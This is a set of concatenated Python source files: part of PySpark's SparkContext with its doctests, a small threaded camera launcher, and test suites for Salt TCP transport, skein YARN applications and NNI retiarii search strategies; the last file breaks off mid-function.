    :param keyConverter: (None by default)
    :param valueConverter: (None by default)
    :param conf: Hadoop configuration, passed in as a dict (None by default)
    :param batchSize: The number of Python objects represented as a single
           Java object. (default 0, choose batchSize automatically)
    """
    java_conf = self._dictToJavaMap(conf)
    java_rdd = self._jvm.PythonRDD.newAPIHadoopRDD(
        self._jsc, inputFormatClass, keyClass, valueClass,
        keyConverter, valueConverter, java_conf, batchSize)
    return RDD(java_rdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
               valueConverter=None, conf=None, batchSize=0):
    """
    Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
    a local file system (available on all nodes), or any Hadoop-supported file
    system URI. The mechanism is the same as for sc.sequenceFile. A Hadoop
    configuration can be passed in as a Python dict; it is translated into a
    Configuration in Java.

    :param path: path to Hadoop file
    :param inputFormatClass: fully qualified classname of Hadoop InputFormat
           (e.g. "org.apache.hadoop.mapred.TextInputFormat")
    :param keyClass: fully qualified classname of key Writable class
           (e.g. "org.apache.hadoop.io.Text")
    :param valueClass: fully qualified classname of value Writable class
           (e.g. "org.apache.hadoop.io.LongWritable")
    :param keyConverter: (None by default)
    :param valueConverter: (None by default)
    :param conf: Hadoop configuration, passed in as a dict (None by default)
    :param batchSize: The number of Python objects represented as a single
           Java object. (default 0, choose batchSize automatically)
    """
    java_conf = self._dictToJavaMap(conf)
    java_rdd = self._jvm.PythonRDD.hadoopFile(
        self._jsc, path, inputFormatClass, keyClass, valueClass,
        keyConverter, valueConverter, java_conf, batchSize)
    return RDD(java_rdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
              valueConverter=None, conf=None, batchSize=0):
    """
    Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an
    arbitrary Hadoop configuration, which is passed in as a Python dict and
    translated into a Configuration in Java. The mechanism is the same as for
    sc.sequenceFile.

    :param inputFormatClass: fully qualified classname of Hadoop InputFormat
           (e.g. "org.apache.hadoop.mapred.TextInputFormat")
    :param keyClass: fully qualified classname of key Writable class
           (e.g. "org.apache.hadoop.io.Text")
    :param valueClass: fully qualified classname of value Writable class
           (e.g. "org.apache.hadoop.io.LongWritable")
    :param keyConverter: (None by default)
    :param valueConverter: (None by default)
    :param conf: Hadoop configuration, passed in as a dict (None by default)
    :param batchSize: The number of Python objects represented as a single
           Java object. (default 0, choose batchSize automatically)
    """
    java_conf = self._dictToJavaMap(conf)
    java_rdd = self._jvm.PythonRDD.hadoopRDD(
        self._jsc, inputFormatClass, keyClass, valueClass,
        keyConverter, valueConverter, java_conf, batchSize)
    return RDD(java_rdd, self)
def _checkpointFile(self, name, input_deserializer):
    """Internal: reload an RDD from checkpoint data saved under `name`."""
    checkpointed = self._jsc.checkpointFile(name)
    return RDD(checkpointed, self, input_deserializer)
@ignore_unicode_prefix
def union(self, rdds):
    """
    Build the union of a list of RDDs.

    RDDs with different serialized formats are supported, although this
    forces them to be reserialized using the default serializer first:

    >>> path = os.path.join(tempdir, "union-text.txt")
    >>> with open(path, "w") as testFile:
    ...    _ = testFile.write("Hello")
    >>> textFile = sc.textFile(path)
    >>> textFile.collect()
    [u'Hello']
    >>> parallelized = sc.parallelize(["World!"])
    >>> sorted(sc.union([textFile, parallelized]).collect())
    [u'Hello', 'World!']
    """
    # Normalize serializers up front so the Java-side union is uniform.
    if any(rdd._jrdd_deserializer != rdds[0]._jrdd_deserializer for rdd in rdds):
        rdds = [rdd._reserialize() for rdd in rdds]
    head = rdds[0]._jrdd
    tail = [rdd._jrdd for rdd in rdds[1:]]
    return RDD(self._jsc.union(head, tail), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
    """
    Broadcast a read-only variable to the cluster, returning a
    L{Broadcast<pyspark.broadcast.Broadcast>} object for reading it in
    distributed functions. The variable will be sent to each cluster
    only once.
    """
    return Broadcast(self, value, self._pickled_broadcast_vars)
def accumulator(self, value, accum_param=None):
    """
    Create an L{Accumulator} with the given initial value, using a given
    L{AccumulatorParam} helper object to define how to add values of the
    data type if provided. Default AccumulatorParams are used for integers
    and floating-point numbers if you do not provide one. For other types,
    a custom AccumulatorParam can be used.
    """
    if accum_param is None:
        # Dispatch on the value's type; checked in order, so bool (an int
        # subclass) resolves to the int param exactly as before.
        default_params = (
            (int, accumulators.INT_ACCUMULATOR_PARAM),
            (float, accumulators.FLOAT_ACCUMULATOR_PARAM),
            (complex, accumulators.COMPLEX_ACCUMULATOR_PARAM),
        )
        for value_type, param in default_params:
            if isinstance(value, value_type):
                accum_param = param
                break
        else:
            raise TypeError("No default accumulator param for type %s" % type(value))
    SparkContext._next_accum_id += 1
    return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
def addFile(self, path, recursive=False):
    """
    Add a file to be downloaded with this Spark job on every node.
    The C{path} passed can be either a local file, a file in HDFS
    (or other Hadoop-supported filesystems), or an HTTP, HTTPS or
    FTP URI.

    To access the file in Spark jobs, use
    L{SparkFiles.get(fileName)<pyspark.files.SparkFiles.get>} with the
    filename to find its download location.

    A directory can be given if the recursive option is set to True.
    Currently directories are only supported for Hadoop-supported filesystems.

    :param path: local file, HDFS file, or HTTP/HTTPS/FTP URI to distribute
    :param recursive: if True, `path` may be a directory (Hadoop filesystems only)

    >>> from pyspark import SparkFiles
    >>> path = os.path.join(tempdir, "test.txt")
    >>> with open(path, "w") as testFile:
    ...    _ = testFile.write("100")
    >>> sc.addFile(path)
    >>> def func(iterator):
    ...    with open(SparkFiles.get("test.txt")) as testFile:
    ...        fileVal = int(testFile.readline())
    ...        return [x * fileVal for x in iterator]
    >>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
    [100, 200, 300, 400]
    """
    # Distribution itself is handled entirely on the JVM side.
    self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
    """
    Add a .py or .zip dependency for all tasks to be executed on this
    SparkContext in the future. The C{path} passed can be either a local
    file, a file in HDFS (or other Hadoop-supported filesystems), or an
    HTTP, HTTPS or FTP URI.
    """
    self.addFile(path)
    # dirname may be directory or HDFS/S3 prefix
    (dirname, basename) = os.path.split(path)
    if basename[-4:].lower() in self.PACKAGE_EXTENSIONS:
        self._python_includes.append(basename)
        # for tests in local mode
        sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), basename))
    if sys.version > '3':
        import importlib
        # A new zip/egg on sys.path requires flushing the import caches.
        importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
    """
    Set the directory under which RDDs are going to be checkpointed. The
    directory must be an HDFS path if running on a cluster.
    """
    self._jsc.sc().setCheckpointDir(dirName)
def _getJavaStorageLevel(self, storageLevel):
    """
    Return the Java StorageLevel corresponding to a pyspark.StorageLevel.

    :param storageLevel: a L{StorageLevel} instance
    :raises TypeError: if `storageLevel` is not a pyspark.StorageLevel
    """
    if not isinstance(storageLevel, StorageLevel):
        # TypeError (a subclass of the previously-raised bare Exception) is
        # the idiomatic error for a wrong argument type; existing
        # `except Exception` handlers still catch it.
        raise TypeError("storageLevel must be of type pyspark.StorageLevel")
    newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
    return newStorageLevel(storageLevel.useDisk,
                           storageLevel.useMemory,
                           storageLevel.useOffHeap,
                           storageLevel.deserialized,
                           storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
    """
    Assigns a group ID to all the jobs started by this thread until the group ID is set to a
    different value or cleared.

    Often, a unit of execution in an application consists of multiple Spark actions or jobs.
    Application programmers can use this method to group all those jobs together and give a
    group description. Once set, the Spark web UI will associate such jobs with this group.

    The application can use L{SparkContext.cancelJobGroup} to cancel all
    running jobs in this group.

    >>> import threading
    >>> from time import sleep
    >>> result = "Not Set"
    >>> lock = threading.Lock()
    >>> def map_func(x):
    ...     sleep(100)
    ...     raise Exception("Task should have been cancelled")
    >>> def start_job(x):
    ...     global result
    ...     try:
    ...         sc.setJobGroup("job_to_cancel", "some description")
    ...         result = sc.parallelize(range(x)).map(map_func).collect()
    ...     except Exception as e:
    ...         result = "Cancelled"
    ...     lock.release()
    >>> def stop_job():
    ...     sleep(5)
    ...     sc.cancelJobGroup("job_to_cancel")
    >>> suppress = lock.acquire()
    >>> suppress = threading.Thread(target=start_job, args=(10,)).start()
    >>> suppress = threading.Thread(target=stop_job).start()
    >>> suppress = lock.acquire()
    >>> print(result)
    Cancelled

    If interruptOnCancel is set to true for the job group, then job cancellation will result
    in Thread.interrupt() being called on the job's executor threads. This is useful to help
    ensure that the tasks are actually stopped in a timely manner, but is off by default due
    to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
    """
    # Group assignment is thread-local on the JVM side.
    self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
    """
    Set a local property that affects jobs submitted from this thread, such as the
    Spark fair scheduler pool.
    """
    self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
    """
    Get a local property set in this thread, or null if it is missing. See
    L{setLocalProperty}.
    """
    return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
    """Set a human readable description of the current job."""
    self._jsc.setJobDescription(value)
def sparkUser(self):
    """Get SPARK_USER for the user who is running this SparkContext."""
    return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
    """
    Cancel active jobs for the specified group. See L{SparkContext.setJobGroup}
    for more information.
    """
    self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
    """Cancel all jobs that have been scheduled or are running."""
    self._jsc.sc().cancelAllJobs()
def statusTracker(self):
    """Return a :class:`StatusTracker` for monitoring job and stage progress."""
    return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
    """
    Executes the given partitionFunc on the specified set of partitions,
    returning the result as an array of elements.

    If 'partitions' is not specified, this will run over all partitions.

    :param rdd: the RDD to compute on
    :param partitionFunc: function applied to each partition's iterator
    :param partitions: list of partition ids to run on (default: all)
    :param allowLocal: not referenced in this implementation; accepted for
        API compatibility

    >>> myRDD = sc.parallelize(range(6), 3)
    >>> sc.runJob(myRDD, lambda part: [x * x for x in part])
    [0, 1, 4, 9, 16, 25]

    >>> myRDD = sc.parallelize(range(6), 3)
    >>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
    [0, 1, 16, 25]
    """
    if partitions is None:
        partitions = range(rdd._jrdd.partitions().size())
    # Implementation note: This is implemented as a mapPartitions followed
    # by runJob() in order to avoid having to pass a Python lambda into
    # SparkContext#runJob.
    mappedRDD = rdd.mapPartitions(partitionFunc)
    port = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
    # Results stream back over a local socket rather than through Py4J.
    return list(_load_from_socket(port, mappedRDD._jrdd_deserializer))
def show_profiles(self):
    """Print the accumulated profile stats to stdout."""
    self.profiler_collector.show_profiles()
def dump_profiles(self, path):
    """Dump the accumulated profile stats into directory `path`."""
    self.profiler_collector.dump_profiles(path)
def getConf(self):
    """Return a copy of this SparkContext's configuration as a L{SparkConf}."""
    conf = SparkConf()
    # Copy so callers can't mutate the live configuration.
    conf.setAll(self._conf.getAll())
    return conf
def _test():
    """Run this module's doctests against a throwaway local SparkContext."""
    import atexit
    import doctest
    import tempfile
    globs = globals().copy()
    # The doctests reference `sc` and `tempdir` as globals.
    globs['sc'] = SparkContext('local[4]', 'PythonTest')
    globs['tempdir'] = tempfile.mkdtemp()
    atexit.register(lambda: shutil.rmtree(globs['tempdir']))
    (failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
    globs['sc'].stop()
    if failure_count:
        exit(-1)
# Running the module directly executes its doctest suite.
if __name__ == "__main__":
    _test()
|
start.py | from threading import Thread
import cv2
from facerecognition.main import main as face
from objectrecognition.main import main as object_rec
from usb_serial.main import main as usb

# Single capture handle shared by both vision threads.
# NOTE(review): cv2.VideoCapture is not documented as thread-safe; two
# threads reading from the same handle may interleave frame reads --
# confirm the consumers tolerate this, or give each its own capture.
camera = cv2.VideoCapture(0)

face_thread = Thread(target=face, args=(camera,))
object_thread = Thread(target=object_rec, args=(camera,))
usb_thread = Thread(target=usb)

# Threads are started and never joined; the process stays alive while
# any of them runs.
face_thread.start()
object_thread.start()
usb_thread.start()
|
tcp_test.py | # -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Thomas Jackson <jacksontj.89@gmail.com>`
'''
# Import python libs
from __future__ import absolute_import
import os
import threading
import tornado.gen
import tornado.ioloop
from tornado.testing import AsyncTestCase
import salt.config
import salt.utils
import salt.transport.server
import salt.transport.client
import salt.exceptions
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath
ensure_in_syspath('../')
import integration
# Import Salt libs
from unit.transport.req_test import ReqChannelMixin
from unit.transport.pub_test import PubChannelMixin
# TODO: move to a library?
def get_config_file_path(filename):
    """Absolute path of `filename` inside the integration-test config dir."""
    config_dir = os.path.join(integration.TMP, 'config')
    return os.path.join(config_dir, filename)
class BaseTCPReqCase(TestCase):
    '''
    Test the req server/client pair over the TCP transport.

    A real ReqServerChannel is created once per class and serviced by a
    tornado IOLoop running on a daemon thread; subclasses supply the
    payload handler and construct the client channel in setUp().
    '''
    @classmethod
    def setUpClass(cls):
        cls.master_opts = salt.config.master_config(get_config_file_path('master'))
        cls.master_opts.update({
            'transport': 'tcp',
            'auto_accept': True,
        })
        cls.minion_opts = salt.config.minion_config(get_config_file_path('minion'))
        cls.minion_opts.update({
            'transport': 'tcp',
            'master_uri': 'tcp://127.0.0.1:{0}'.format(cls.minion_opts['master_port']),
        })
        cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
        cls.server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_opts)
        cls.server_channel.pre_fork(cls.process_manager)
        # Drive the server from its own IOLoop on a daemon thread so the
        # tests can call the client synchronously from the main thread.
        cls.io_loop = tornado.ioloop.IOLoop()
        cls.io_loop.make_current()
        cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
        cls.server_thread = threading.Thread(target=cls.io_loop.start)
        cls.server_thread.daemon = True
        cls.server_thread.start()
    @classmethod
    def tearDownClass(cls):
        # Stop the loop first so the server thread can be joined cleanly.
        cls.io_loop.stop()
        cls.server_thread.join()
        cls.process_manager.kill_children()
        cls.server_channel.close()
        del cls.server_channel
class ClearReqTestCases(BaseTCPReqCase, ReqChannelMixin):
    '''
    Test all of the clear msg stuff
    '''
    def setUp(self):
        # Unencrypted channel; the mixin's tests run against it.
        self.channel = salt.transport.client.ReqChannel.factory(self.minion_opts, crypt='clear')
    @classmethod
    @tornado.gen.coroutine
    def _handle_payload(cls, payload):
        '''
        TODO: something besides echo
        '''
        raise tornado.gen.Return((payload, {'fun': 'send_clear'}))
class AESReqTestCases(BaseTCPReqCase, ReqChannelMixin):
    '''Req channel tests over the default (encrypted) transport.'''
    def setUp(self):
        self.channel = salt.transport.client.ReqChannel.factory(self.minion_opts)
    @classmethod
    @tornado.gen.coroutine
    def _handle_payload(cls, payload):
        '''
        TODO: something besides echo
        '''
        raise tornado.gen.Return((payload, {'fun': 'send'}))

    # TODO: make failed returns have a specific framing so we can raise the same exception
    # on encrypted channels
    def test_badload(self):
        '''
        Test a variety of bad requests, make sure that we get some sort of error
        '''
        msgs = ['', [], tuple()]
        for msg in msgs:
            with self.assertRaises(salt.exceptions.AuthenticationError):
                ret = self.channel.send(msg)
class BaseTCPPubCase(AsyncTestCase):
    '''
    Base case for pub server/client pairs over the TCP transport.

    Starts a PubServerChannel plus a ReqServerChannel (required for minion
    auth) on a background IOLoop thread, once per class.
    '''
    @classmethod
    def setUpClass(cls):
        cls.master_opts = salt.config.master_config(get_config_file_path('master'))
        cls.master_opts.update({
            'transport': 'tcp',
            'auto_accept': True,
        })
        cls.minion_opts = salt.config.minion_config(get_config_file_path('minion'))
        cls.minion_opts.update({
            'transport': 'tcp',
            'master_ip': '127.0.0.1',
            'auth_timeout': 1,
            'master_uri': 'tcp://127.0.0.1:{0}'.format(cls.minion_opts['master_port']),
        })
        cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
        cls.server_channel = salt.transport.server.PubServerChannel.factory(cls.master_opts)
        cls.server_channel.pre_fork(cls.process_manager)
        # we also require req server for auth
        cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_opts)
        cls.req_server_channel.pre_fork(cls.process_manager)
        cls._server_io_loop = tornado.ioloop.IOLoop()
        cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls._server_io_loop)
        cls.server_thread = threading.Thread(target=cls._server_io_loop.start)
        cls.server_thread.start()
    @classmethod
    def _handle_payload(cls, payload):
        '''
        TODO: something besides echo
        '''
        return payload, {'fun': 'send_clear'}
    @classmethod
    def tearDownClass(cls):
        cls._server_io_loop.stop()
        cls.server_thread.join()
        cls.process_manager.kill_children()
        cls.req_server_channel.close()
        del cls.req_server_channel
    def setUp(self):
        super(BaseTCPPubCase, self).setUp()
        # Snapshot the IOLoop's FD handlers so tearDown can detect leaks.
        self._start_handlers = dict(self.io_loop._handlers)
    def tearDown(self):
        super(BaseTCPPubCase, self).tearDown()
        failures = []
        # NOTE(review): dict.iteritems() is Python 2 only -- confirm this
        # suite is never collected under Python 3.
        for k, v in self.io_loop._handlers.iteritems():
            if self._start_handlers.get(k) != v:
                failures.append((k, v))
        if len(failures) > 0:
            raise Exception('FDs still attached to the IOLoop: {0}'.format(failures))
class AsyncPubChannelTest(BaseTCPPubCase, PubChannelMixin):
    '''
    Tests around the publish system; all test methods come from the mixin.
    '''
# Direct invocation runs the req-channel suites without a salt daemon.
if __name__ == '__main__':
    from integration import run_tests
    run_tests(ClearReqTestCases, needs_daemon=False)
    run_tests(AESReqTestCases, needs_daemon=False)
|
test_core.py | from __future__ import print_function, division, absolute_import
import os
import time
import weakref
from collections import MutableMapping
from threading import Thread
import pytest
import skein
from skein.exceptions import FileNotFoundError, FileExistsError
from skein.test.conftest import (run_application, wait_for_containers,
wait_for_success, get_logs)
def test_security(tmpdir):
    """Round-trip Security credentials through a directory, incl. force/missing cases."""
    path = str(tmpdir)
    s1 = skein.Security.from_new_directory(path)
    s2 = skein.Security.from_directory(path)
    assert s1 == s2
    # Refusing to overwrite an existing credential directory.
    with pytest.raises(FileExistsError):
        skein.Security.from_new_directory(path)
    # Test force=True
    with open(s1.cert_path) as fil:
        data = fil.read()
    s1 = skein.Security.from_new_directory(path, force=True)
    with open(s1.cert_path) as fil:
        data2 = fil.read()
    # force=True regenerated the certificate.
    assert data != data2
    os.remove(s1.cert_path)
    with pytest.raises(FileNotFoundError):
        skein.Security.from_directory(path)
def pid_exists(pid):
    """Return True if a process with the given pid appears to be running.

    Uses ``os.kill(pid, 0)``, which performs the existence/permission check
    without delivering a signal. NOTE: a live process owned by another user
    can raise EPERM and so be reported as not running.
    """
    try:
        os.kill(pid, 0)
        return True
    except OSError:
        return False
def test_client(security, kinit, tmpdir):
    """Client lifecycle: spawn, attach to an existing daemon, close, reconnect errors."""
    logpath = str(tmpdir.join("log.txt"))
    with skein.Client(security=security, log=logpath) as client:
        # smoketests
        client.applications()
        repr(client)
        # Attaching to the same address must not spawn a second daemon.
        client2 = skein.Client(address=client.address, security=security)
        assert client2._proc is None
        # smoketests
        client2.applications()
        repr(client2)
    # Process was definitely closed
    assert not pid_exists(client._proc.pid)
    # Log was written
    assert os.path.exists(logpath)
    with open(logpath) as fil:
        assert len(fil.read()) > 0
    # Connection error on closed client
    with pytest.raises(skein.ConnectionError):
        client2.applications()
    # Connection error on connecting to missing daemon
    with pytest.raises(skein.ConnectionError):
        skein.Client(address=client.address, security=security)
def test_client_closed_when_reference_dropped(security, kinit):
    """Dropping the last reference must reap the daemon process."""
    client = skein.Client(security=security, log=False)
    ref = weakref.ref(client)
    pid = client._proc.pid
    del client
    # No surviving references, and the daemon was shut down with it.
    assert ref() is None
    assert not pid_exists(pid)
def test_simple_app(client):
    """Basic application lifecycle: connect, status, kill-on-exit bookkeeping."""
    with run_application(client) as app:
        # Nest manager here to call cleanup manually in this test
        with app:
            # wait for app to start
            ac = app.connect()
            assert app.is_running()
            # calling again is fine
            isinstance(app.connect(), skein.ApplicationClient)
            isinstance(app.connect(wait=False), skein.ApplicationClient)
            # smoketest reprs
            repr(app)
            repr(ac)
            report = app.status()
            running_apps = client.applications()
            assert report.id in {a.id for a in running_apps}
            assert report.state == 'RUNNING'
            assert report.final_status == 'UNDEFINED'
        # Inner context exit performed cleanup, killing the app.
        report = app.status()
        assert report.state == 'KILLED'
        assert report.final_status == 'KILLED'
        with pytest.raises(skein.ConnectionError):
            app.connect()
        running_apps = client.applications()
        assert report.id not in {a.id for a in running_apps}
        killed_apps = client.applications(states=['killed'])
        assert report.id in {a.id for a in killed_apps}
def test_shutdown_app(client):
    """An explicit shutdown propagates its status to the final report."""
    with run_application(client) as app:
        ac = app.connect()
        ac.shutdown(status='SUCCEEDED')
        assert app.status().final_status == 'SUCCEEDED'
def test_describe(client):
    """describe() returns a single Service or the whole ApplicationSpec."""
    with run_application(client) as app:
        ac = app.connect()
        s = ac.describe(service='sleeper')
        assert isinstance(s, skein.Service)
        a = ac.describe()
        assert isinstance(a, skein.ApplicationSpec)
        # The full spec embeds the same service object.
        assert a.services['sleeper'] == s
def test_key_value(client):
    """The application key-value store behaves like a typed MutableMapping."""
    with run_application(client) as app:
        ac = app.connect()
        assert isinstance(ac.kv, MutableMapping)
        assert ac.kv is ac.kv
        assert dict(ac.kv) == {}
        ac.kv['foo'] = 'bar'
        assert ac.kv['foo'] == 'bar'
        assert dict(ac.kv) == {'foo': 'bar'}
        assert ac.kv.to_dict() == {'foo': 'bar'}
        assert len(ac.kv) == 1
        del ac.kv['foo']
        assert ac.kv.to_dict() == {}
        assert len(ac.kv) == 0
        with pytest.raises(KeyError):
            ac.kv['fizz']
        # Keys and values must be strings.
        with pytest.raises(TypeError):
            ac.kv[1] = 'foo'
        with pytest.raises(TypeError):
            ac.kv['foo'] = 1

        def set_foo():
            time.sleep(0.5)
            ac2 = app.connect()
            ac2.kv['foo'] = 'baz'

        # wait() blocks until another connection sets the key.
        setter = Thread(target=set_foo)
        setter.daemon = True
        setter.start()
        val = ac.kv.wait('foo')
        assert val == 'baz'
        # Get immediately for set keys
        val2 = ac.kv.wait('foo')
        assert val2 == 'baz'
def test_dynamic_containers(client):
    """Scaling a service up/down and killing containers updates instance state."""
    with run_application(client) as app:
        ac = app.connect()
        initial = wait_for_containers(ac, 1, states=['RUNNING'])
        assert initial[0].state == 'RUNNING'
        assert initial[0].service_name == 'sleeper'
        # Scale sleepers up to 3 containers
        new = ac.scale('sleeper', 3)
        assert len(new) == 2
        for c in new:
            assert c.state == 'REQUESTED'
        wait_for_containers(ac, 3, services=['sleeper'], states=['RUNNING'])
        # Scale down to 1 container
        stopped = ac.scale('sleeper', 1)
        assert len(stopped) == 2
        # Stopped oldest 2 instances
        assert stopped[0].instance == 0
        assert stopped[1].instance == 1
        # Scale up to 2 containers
        new = ac.scale('sleeper', 2)
        # Calling twice is no-op
        new2 = ac.scale('sleeper', 2)
        assert len(new2) == 0
        assert new[0].instance == 3
        current = wait_for_containers(ac, 2, services=['sleeper'],
                                      states=['RUNNING'])
        assert current[0].instance == 2
        assert current[1].instance == 3
        # Manually kill instance 3
        ac.kill('sleeper_3')
        current = ac.containers()
        assert len(current) == 1
        assert current[0].instance == 2
        # Fine to kill already killed container
        ac.kill('sleeper_1')
        # All killed containers
        killed = ac.containers(states=['killed'])
        assert len(killed) == 3
        assert [c.instance for c in killed] == [0, 1, 3]
        # Can't scale non-existant service
        with pytest.raises(ValueError):
            ac.scale('foobar', 2)
        # Can't scale negative
        with pytest.raises(ValueError):
            ac.scale('sleeper', -5)
        # Can't kill non-existant container
        with pytest.raises(ValueError):
            ac.kill('foobar_1')
        with pytest.raises(ValueError):
            ac.kill('sleeper_500')
        # Invalid container id
        with pytest.raises(ValueError):
            ac.kill('fooooooo')
        # Can't get containers for non-existant service
        with pytest.raises(ValueError):
            ac.containers(services=['sleeper', 'missing'])
def test_container_permissions(client, has_kerberos_enabled):
    """Verify the identity a YARN container runs under.

    $USER always reflects the submitting user; the actual login id
    (``whoami``) is the submitter only when kerberos is enabled, otherwise
    the process runs as the ``yarn`` user.
    """
    commands = ['echo "USER_ENV=[$USER]"',
                'echo "LOGIN_ID=[$(whoami)]"',
                'hdfs dfs -touchz /user/testuser/test_container_permissions']
    service = skein.Service(resources=skein.Resources(memory=128, vcores=1),
                            commands=commands)
    spec = skein.ApplicationSpec(name="test_container_permissions",
                                 queue="default",
                                 services={'service': service})
    # NOTE(review): original indentation was lost; the log assertions are
    # assumed to run inside the run_application context -- confirm.
    with run_application(client, spec=spec) as app:
        wait_for_success(app)
        logs = get_logs(app.app_id)
        assert "USER_ENV=[testuser]" in logs
        if has_kerberos_enabled:
            assert "LOGIN_ID=[testuser]" in logs
        else:
            assert "LOGIN_ID=[yarn]" in logs
|
test_strategy.py | import random
import sys
import time
import threading
from typing import *
import nni.retiarii.execution.api
import nni.retiarii.nn.pytorch as nn
import nni.retiarii.strategy as strategy
import pytest
import torch
import torch.nn.functional as F
from nni.retiarii import Model
from nni.retiarii.converter import convert_to_graph
from nni.retiarii.execution import wait_models
from nni.retiarii.execution.interface import AbstractExecutionEngine, WorkerInfo, MetricData, AbstractGraphListener
from nni.retiarii.graph import DebugEvaluator, ModelStatus
from nni.retiarii.nn.pytorch.mutator import process_inline_mutation
class MockExecutionEngine(AbstractExecutionEngine):
    """In-memory execution engine used by the strategy tests.

    Each submitted model is "trained" on a background thread: after a short
    random delay it either fails (with probability ``failure_prob``) or is
    assigned a random metric and marked Trained.
    """

    def __init__(self, failure_prob=0.):
        self.models = []                  # every model ever submitted
        self.failure_prob = failure_prob  # chance a model ends up Failed
        self._resource_left = 4           # simulated concurrent-trial budget

    def _model_complete(self, model: Model):
        # Runs on a worker thread; simulates a training run of random length.
        time.sleep(random.uniform(0, 1))
        if random.uniform(0, 1) < self.failure_prob:
            model.status = ModelStatus.Failed
        else:
            model.metric = random.uniform(0, 1)
            model.status = ModelStatus.Trained
        self._resource_left += 1

    def submit_models(self, *models: Model) -> None:
        # One thread per model; the resource counter is restored by
        # _model_complete when the "training" finishes.
        for model in models:
            self.models.append(model)
            self._resource_left -= 1
            threading.Thread(target=self._model_complete, args=(model, )).start()

    def list_models(self) -> List[Model]:
        return self.models

    def query_available_resource(self) -> Union[List[WorkerInfo], int]:
        return self._resource_left

    def budget_exhausted(self) -> bool:
        # Not exercised by these tests.
        pass

    def register_graph_listener(self, listener: AbstractGraphListener) -> None:
        pass

    def trial_execute_graph(cls) -> MetricData:
        pass
def _reset_execution_engine(engine=None):
    # Install (or, when called with no argument, clear) the global execution
    # engine that retiarii strategies submit models to.
    nni.retiarii.execution.api._execution_engine = engine
class Net(nn.Module):
    """Small CNN with two mutable LayerChoice heads (labels 'fc1' and 'fc2').

    ``diff_size=True`` adds a third candidate to fc2 so the two choices have
    different numbers of options.
    """

    def __init__(self, hidden_size=32, diff_size=False):
        super(Net, self).__init__()
        self.conv1 = nn.Conv2d(1, 20, 5, 1)
        self.conv2 = nn.Conv2d(20, 50, 5, 1)
        # Choice between bias / no-bias variants of the first FC layer.
        self.fc1 = nn.LayerChoice([
            nn.Linear(4*4*50, hidden_size, bias=True),
            nn.Linear(4*4*50, hidden_size, bias=False)
        ], label='fc1')
        # Second choice; optionally extended to three candidates.
        self.fc2 = nn.LayerChoice([
            nn.Linear(hidden_size, 10, bias=False),
            nn.Linear(hidden_size, 10, bias=True)
        ] + ([] if not diff_size else [nn.Linear(hidden_size, 10, bias=False)]), label='fc2')

    def forward(self, x):
        # The 4*4*50 flatten implies MNIST-style 28x28 single-channel input
        # -- assumed, confirm with callers.
        x = F.relu(self.conv1(x))
        x = F.max_pool2d(x, 2, 2)
        x = F.relu(self.conv2(x))
        x = F.max_pool2d(x, 2, 2)
        x = x.view(-1, 4*4*50)
        x = F.relu(self.fc1(x))
        x = self.fc2(x)
        return F.log_softmax(x, dim=1)
def _get_model_and_mutators(**kwargs):
    """Build Net(**kwargs), convert it to graph IR, and collect its mutators."""
    base_model = Net(**kwargs)
    script_module = torch.jit.script(base_model)
    base_model_ir = convert_to_graph(script_module, base_model)
    base_model_ir.evaluator = DebugEvaluator()
    mutators = process_inline_mutation(base_model_ir)
    return base_model_ir, mutators
def test_grid_search():
    """Grid search must enumerate every (fc1 bias, fc2 bias) combination."""
    gridsearch = strategy.GridSearch()
    engine = MockExecutionEngine()
    _reset_execution_engine(engine)
    gridsearch.run(*_get_model_and_mutators())
    wait_models(*engine.models)
    selection = set()
    for model in engine.models:
        selection.add((
            model.graphs['_model__fc1'].hidden_nodes[0].operation.parameters['bias'],
            model.graphs['_model__fc2'].hidden_nodes[0].operation.parameters['bias']
        ))
    # 2 fc1 options x 2 fc2 options = 4 distinct models
    assert len(selection) == 4
    _reset_execution_engine()
def test_random_search():
    """Random search should eventually cover all 4 bias combinations."""
    # Local renamed from `random` to `random_search`: the original shadowed
    # the stdlib `random` module imported at the top of this file.
    random_search = strategy.Random()
    engine = MockExecutionEngine()
    _reset_execution_engine(engine)
    random_search.run(*_get_model_and_mutators())
    wait_models(*engine.models)
    selection = set()
    for model in engine.models:
        selection.add((
            model.graphs['_model__fc1'].hidden_nodes[0].operation.parameters['bias'],
            model.graphs['_model__fc2'].hidden_nodes[0].operation.parameters['bias']
        ))
    # 2 fc1 options x 2 fc2 options = 4 distinct models
    assert len(selection) == 4
    _reset_execution_engine()
def test_evolution():
    """Run regularized evolution under both failure-handling modes."""
    # on_failure='ignore': failed trials are dropped.
